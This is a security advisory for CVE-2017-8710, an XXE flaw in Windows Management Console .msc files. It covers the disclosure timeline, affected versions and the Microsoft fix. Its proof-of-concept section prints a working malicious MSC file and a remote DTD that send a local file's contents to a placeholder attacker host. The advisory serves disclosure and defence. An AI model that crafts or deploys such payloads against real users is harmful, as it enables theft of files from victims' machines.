Document Title:
===============
Microsoft Windows - MSC XXE Data Exfiltrate Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2094
MSRC Acknowledgements: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8710
Public References:
https://nvd.nist.gov/vuln/detail/CVE-2017-8710
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8710
https://www.symantec.com/security_response/vulnerability.jsp?bid=100793
https://uk.norton.com/online-threats/microsoftwindowscve-2017-8710informationdisclosurevulne-100793-vulnerability.html
Video: https://www.vulnerability-lab.com/get_content.php?id=2095
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8710
CVE-ID:
=======
CVE-2017-8710
Release Date:
=============
2017-09-18
Vulnerability Laboratory ID (VL-ID):
====================================
2094
Common Vulnerability Scoring System:
====================================
4.3
Vulnerability Class:
====================
Filter or Protection Mechanism Bypass
Current Estimated Price:
========================
5.000⏠- 10.000âŹ
Product & Service Introduction:
===============================
The MSC file extension is a snap-in control file associated with Microsoft Management Console
which was developed by Microsoft Corporation. Files affixed with this extension are also known
as Microsoft Saved Console Files. Microsoft Management Console allows user to customize the
console or modules to hold snap -ins. It is used to configure and monitor Windows computer
systems. The snap in contains a program that provides additional administration management
like device management, system monitoring and disk defragmentation. A snap-in can hold
additional snap-in extension. Users can create and customize MSC files to publish a collection
of tools or utilities to other users through email, network sharing or web posting. It can
also be assigned to other networks, users, and groups with policy settings. System administrators
may provide restrictions by customization. In case MMC fails to complete a normal shut down, the
SMS.msc file may be removed from the system. Files in MSC format can be opened with Microsoft
Windows Server in Microsoft Windows platforms.
(Copy of the Homepage: https://www.reviversoft.com/file-extensions/msc )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a xml external entity (XXE) data exfiltration vulnerability in the
official Microsoft Management (Saved Console & System Console - Microsoft Common Console MSC Document that is associated with
the Microsoft Management Console MMC of multiple Microsoft windows operating system products.
Vulnerability Disclosure Timeline:
==================================
2017-05-25: Researcher Notification & Coordination (SaifAllah benMassaoud)
2017-06-03: Vendor Notification (Microsoft Security Response Center)
2017-06-05: Vendor Notification / Security Update required (Microsoft Security Response Center)
2017-06-29: Vendor Notification / Plan to release it in September instead of August (Microsoft Security Response Center)
2017-08-11: Vendor Notification / CVE assigned (Microsoft Security Response Center)
2017-09-12: Security Acknowledgements ((Microsoft Security Response Center))
2017-09-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Microsoft Corporation
Product: Microsoft Windows - Operating System 7,8, 2008- & 2008 R2 - (x32 & x64)
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A xml external entity (XXE) data exfiltration vulnerability has been discovered in the official Microsoft Management
(Saved Console & System Console - Microsoft Common Console MSC Document that is associated with the Microsoft
Management Console MMC of multiple Microsoft windows operating system products.
Attackers could create a msc file containing specially crafted xml content that is designed to submit malicious input
to the affected software.
The vulnerability is due to improper parsing of xml content that contains a reference to an external entity. An attacker
could exploit this vulnerability by persuading an authenticated user to open a malicious crafted msc file. An exploit could
allow the attacker to conduct an xml external entity (XXE) attack, which the attacker could use to access sensitive information
on the targeted system that may aid in further attacks.
In all cases, the vulnerability could used for data exfiltration and a victimes machines compromise that is relies on
social engineering for exploitation ( Phishing - remote share & USB - HID Attack etc ... )
The security risk of the xml external entity (XXE) data exfiltration vulnerability is estimated as medium.
The Exploitation of the vulnerability does not require the target user to have any special permissions.
Successful exploitation of the vulnerability results in data exfiltration and computer system compromise.
Affected Software - File Type(s):
[+] Microsoft Common Console Document (.msc)
Affected:
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for Itanium-Based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Tested on :
[+] Windows XP Service Pack 3
[+] Windows 7 Ultimate
[+] Windows 10 Pro
Proof of Concept (PoC):
=======================
A xml external entity (XXE) data exfiltration vulnerability can be exploited by local attackers without user special permissions.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
1 The Video above :
[+] Tested Windows XP SP3
2 Local system Group/User Permission :
[+] Authenticated Users
PoC: Exploitation
## Malicious MSC file ##
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ENTITY % file SYSTEM "C:Windows[File-Name].ini">
<!ENTITY % dtd SYSTEM "http://x.x.x.x:443/[PAYLOAD.dtd">
%dtd;]>
<pwn>&send;</pwn>
## PAYLOAD.DTD ##
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://x.x.x.x:443?%file;'>">
%all;
Solution - Fix & Patch:
=======================
Microsoft has addressed the vulnerability by changing how the affected software parses the basic delivered xml content.
Security Risk:
==============
The security risk of the xxe data exfiltration vulnerability is estimated as medium. (CVSS 4.3)
Credits & Authors:
==================
S.AbenMassaoud [[email protected]] - @benmassaou - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.
Copyright Š 2017 | Vulnerability Laboratory - [Evolution Security GmbH]â˘